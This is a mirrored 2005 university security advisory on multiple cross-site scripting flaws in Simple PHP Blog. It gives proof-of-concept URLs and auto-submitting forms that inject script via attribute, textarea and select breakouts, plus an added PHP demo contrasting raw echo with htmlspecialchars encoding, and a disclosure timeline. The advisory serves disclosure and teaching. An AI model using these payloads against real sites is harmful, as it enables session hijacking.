Simple PHP Blog: Multiple XSS Vulnerabilities

Category: CWE-79 (cross-site scripting)
Severity: High
Risk: High
Exploitation: Remote
Date: 2005-11-16
Our sensors found this exploit at: http://cxsecurity.com/ascii/WLB-2005110006

Below is a copy:

===========================================================
Simple PHP Blog: Multiple XSS Vulnerabilities
===========================================================
Technical University of Vienna Security Advisory
TUVSA-0511-001, November 2, 2005
===========================================================

Affected applications
----------------------

Simple PHP Blog (www.simplephpblog.com)

Versions 0.4.5 and prior.

Description
------------

1.) preview_cgi.php, part 1

There is a cross-site scripting (XSS) vulnerability in the file preview_cgi.php on line 126: The variable $entry is echoed,
but hasn't been sufficiently sanitized before. When logged in, this issue can be tested with the following URL:

http://your-server/path-to-sphpblog/preview_cgi.php?entry=foo"><script>alert(document.cookie)</script>

The fields "your-server" and "path-to-sphpblog" in the given URL have to be adjusted accordingly.

2.) preview_cgi.php, part 2

There is another cross-site scripting vulnerability in the file preview_cgi.php on line 129: The variable $temp_subject is echoed,
but hasn't been sufficiently sanitized before. When logged in, this issue can be tested by visiting a page structured
as follows:

<form action="http://your-server/path-to-sphpblog/preview_cgi.php" method="post">
        <input name="blog_subject" value='"><script>alert(document.cookie)</script>'/>
        <input type="submit"/>
    </form>

<script type="text/javascript">
      document.forms[0].submit();
    </script>

An analogous vulnerability affects preview_cgi.php on line 158, where the blog text is echoed inside a <textarea>. Because a textarea body ends at the first </textarea>, the payload closes the element before injecting script:

<form action="http://your-server/path-to-sphpblog/preview_cgi.php" method="post">
        <input name="blog_text" value='</textarea><script>alert(document.cookie)</script>'/>
        <input type="submit"/>
    </form>

<script type="text/javascript">
      document.forms[0].submit();
    </script>

3.) preview_static_cgi.php

In the file preview_static_cgi.php, there are four vulnerabilities resembling those in preview_cgi.php:

- line 73, variable $entry; example URL:

http://your-server/path-to-sphpblog/preview_static_cgi.php?entry=foo"><script>alert(document.cookie)</script>

- line 76, variable $temp_subject; example file:

<form action="http://your-server/path-to-sphpblog/preview_static_cgi.php" method="post">
        <input name="blog_subject" value='"><script>alert(document.cookie)</script>'/>
        <input type="submit"/>
    </form>

<script type="text/javascript">
      document.forms[0].submit();
    </script>

- line 158, variable $temp_text; example file:

<form action="http://your-server/path-to-sphpblog/preview_static_cgi.php" method="post">
        <input name="blog_text" value='</textarea><script>alert(document.cookie)</script>'/>
        <input type="submit"/>
    </form>

<script type="text/javascript">
      document.forms[0].submit();
    </script>

- line 108, variable $temp_file_name: it is set to $_POST['file_name'] when $_GET['entry'] is not set, and to $entry otherwise
(in that case, see the vulnerability on line 73); example file:

<form action="http://your-server/path-to-sphpblog/preview_static_cgi.php" method="post">
        <input name="file_name" value='"><script>alert(document.cookie)</script>'/>
        <input type="submit"/>
    </form>

<script type="text/javascript">
      document.forms[0].submit();
    </script>

4.) colors.php

The variables $preset_name and $result on line 187 of the file colors.php are also vulnerable to XSS. The values reach
colors.php through a form submission to colors_cgi.php; this can be tested with one of the following two pages:

<form action="http://your-server/path-to-sphpblog/colors_cgi.php" method="post">
        <input name="save_btn" value="1"/>
        <input name="scheme_name" value='"></option></select><script>alert(document.cookie)</script>'/>
        <input name="scheme_file" value="blabla"/>
        <input type="submit"/>
    </form>

<script type="text/javascript">
      document.forms[0].submit();
    </script>

or

<form action="http://your-server/path-to-sphpblog/colors_cgi.php" method="post">
        <input name="save_btn" value="1"/>
        <input name="scheme_name" value="myscheme"/>
        <input name="scheme_file" value="blabla"/>
        <input name="bg_color" value='"><script>alert(document.cookie)</script>'/>
        <input type="submit"/>
    </form>

<script type="text/javascript">
      document.forms[0].submit();
    </script>
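The findings above share one root cause: request data is echoed into HTML without output encoding, in three different
parsing contexts (a double-quoted attribute value, a <textarea> body, and a <select> built from saved names). The
following script is an added example written for this page; it is not code from Simple PHP Blog or from the advisory,
and the function names, the markup layout and the shape of the scheme <select> are assumptions inferred from the
payloads, not reproductions of preview_cgi.php, preview_static_cgi.php or colors.php. It renders the advisory's own
payloads through a raw-echo version of each context and through a version that applies htmlspecialchars() at output
time, so the difference can be inspected directly.

```php
<?php
// Added example for this page, not Simple PHP Blog code. Function names, the
// markup and the <select> layout are assumptions chosen to mirror the contexts
// the advisory describes (attribute value, <textarea> body, <option> list).

declare(strict_types=1);

// Vulnerable rendering: request data concatenated straight into markup, the
// pattern behind each finding in the advisory.
function render_preview_vulnerable(string $entry, string $subject, string $text, array $schemes): string
{
    $html  = '<input type="hidden" name="entry" value="' . $entry . '"/>' . "\n";
    $html .= '<input name="blog_subject" value="' . $subject . '"/>' . "\n";
    $html .= '<textarea name="blog_text">' . $text . '</textarea>' . "\n";
    $html .= '<select name="preset_name">' . "\n";
    foreach ($schemes as $name) {
        $html .= '  <option value="' . $name . '">' . $name . '</option>' . "\n";
    }
    $html .= '</select>' . "\n";
    return $html;
}

// Output-encoding helper. ENT_QUOTES encodes both ' and ", so the value is safe
// inside attributes delimited by either quote; ENT_SUBSTITUTE replaces invalid
// UTF-8 instead of returning an empty string (which would silently drop content).
function h(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Hardened rendering: identical markup, every interpolated value encoded.
function render_preview_hardened(string $entry, string $subject, string $text, array $schemes): string
{
    $html  = '<input type="hidden" name="entry" value="' . h($entry) . '"/>' . "\n";
    $html .= '<input name="blog_subject" value="' . h($subject) . '"/>' . "\n";
    // A <textarea> body is RCDATA: only "</textarea" can terminate it, and
    // encoding "<" to "&lt;" removes that sequence from the payload.
    $html .= '<textarea name="blog_text">' . h($text) . '</textarea>' . "\n";
    $html .= '<select name="preset_name">' . "\n";
    foreach ($schemes as $name) {
        $html .= '  <option value="' . h($name) . '">' . h($name) . '</option>' . "\n";
    }
    $html .= '</select>' . "\n";
    return $html;
}

// True if a raw "<script" survives in the rendered page, i.e. a payload landed
// in a script-capable position rather than being encoded to "&lt;script".
function contains_live_script(string $html): bool
{
    return stripos($html, '<script') !== false;
}

// Constructed inputs: the advisory's payloads for each of the three contexts.
$entry   = 'foo"><script>alert(document.cookie)</script>';
$subject = '"><script>alert(document.cookie)</script>';
$text    = '</textarea><script>alert(document.cookie)</script>';
$schemes = ['default', '"></option></select><script>alert(document.cookie)</script>'];

$vuln = render_preview_vulnerable($entry, $subject, $text, $schemes);
$safe = render_preview_hardened($entry, $subject, $text, $schemes);

echo "--- vulnerable ---\n", $vuln;
echo "--- hardened ---\n", $safe;
printf("vulnerable contains live <script>: %s\n", contains_live_script($vuln) ? 'yes' : 'no');
printf("hardened contains live <script>:   %s\n", contains_live_script($safe) ? 'yes' : 'no');
```

Run it with the PHP CLI (php example.php). The encoding is applied at the point of output rather than on input
because the same value may later be written into a file name, a text file or a different markup context, and
input-time filtering would have to anticipate all of them; encoding for the HTML context where the value is actually
emitted is what stops each of the payloads above, including the </textarea> and </option></select> breakouts that a
filter aimed only at quotes would miss.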

Solution
---------

The authors are currently working on a new version of Simple PHP Blog that is
supposed to fix these vulnerabilities.

Timeline:

September 22, 2005:
Vulnerabilities reported via the contact form under
http://www.simplephpblog.com/contact.php.

September 29, 2005:
Message posted to the project-related SourceForge bug forum
(http://sourceforge.net/projects/sphpblog) due to missing response.

October 1, 2005:
Developers reply via SourceForge.

October 2, 2005:
Vulnerabilities reported via the e-mail address given in the previous reply.

Until November 2, 2005:
Occasional contact via e-mail; the advisory release date, announced one week
in advance, drew no response.

November 2, 2005:
Advisory submission.

References
-----------

http://www.seclab.tuwien.ac.at/advisories/TUVSA-0511-001.txt

Nenad Jovanovic
Secure Systems Lab 
Technical University of Vienna 
www.seclab.tuwien.ac.at
